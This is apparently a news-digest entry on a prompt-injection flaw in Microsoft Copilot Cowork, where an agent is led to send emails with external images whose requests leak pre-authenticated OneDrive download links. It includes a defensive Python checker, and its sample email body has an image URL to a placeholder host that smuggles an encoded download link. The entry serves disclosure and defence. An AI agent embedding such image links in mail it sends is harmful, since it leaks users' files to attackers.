Microsoft Copilot Cowork has a significant security vulnerability that allows data exfiltration through its email functionality. Agents can send emails containing external images, which trigger network requests that can potentially leak pre-authenticated OneDrive download links to attackers. This is a serious prompt injection vulnerability in a widely used enterprise AI product.
Background
Prompt injection attacks, in which malicious inputs manipulate an AI system's behavior to bypass security measures, are a growing concern. Microsoft's Copilot products are widely used in enterprise environments, which makes any security vulnerability in them particularly concerning.
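A defender-side check for the exfiltration path described above, added here as an example and not code from Microsoft or from the cited source: it lists the remote images in an outbound HTML email body and marks those whose URL carries another URL. The allowlist, the reason labels and every host in the sample are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: hosts this organisation trusts for images in outbound mail.
ALLOWED_IMAGE_HOSTS = {"assets.corp.example"}

# Constructed sample body of an agent-drafted email; every host is a placeholder.
SAMPLE_BODY = """<p>Quarterly summary.</p>
<img src="cid:logo@corp.example">
<img src="https://assets.corp.example/banner.png">
<img src="https://img.untrusted.example/p.png?d=https%3A%2F%2Ffiles.example.invalid%2Fdl%3Ftoken%3DCONSTRUCTED">
<img src="//cdn.other.example/pixel.gif">"""


class _ImgCollector(HTMLParser):
    """Collect the src of every <img> tag in an HTML body."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "img" and src:
            self.sources.append(src)


def _embeds_url(parts):
    """True if the path or a query value decodes to contain another URL."""
    values = [unquote(parts.path)] + [v for _, v in parse_qsl(parts.query)]
    return any("http://" in v.lower() or "https://" in v.lower() for v in values)


def audit_outbound_html(html_body):
    """Return (src, reason) for each remote image outside the allowlist."""
    collector = _ImgCollector()
    collector.feed(html_body)
    findings = []
    for src in collector.sources:
        # Protocol-relative URLs still fetch over the network.
        parts = urlsplit("https:" + src if src.startswith("//") else src)
        if parts.scheme not in ("http", "https"):
            continue  # cid: and data: images cause no network request
        if (parts.hostname or "").lower() in ALLOWED_IMAGE_HOSTS:
            continue
        reason = "embeds-url" if _embeds_url(parts) else "external-image"
        findings.append((src, reason))
    return findings
```

Findings marked `embeds-url` are the ones to hold for review before the message leaves, since the image request itself would deliver the embedded link to the remote host.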
- Source: Simon Willison
- Published: May 26, 2026 at 11:36 PM
- Score: 8.0 / 10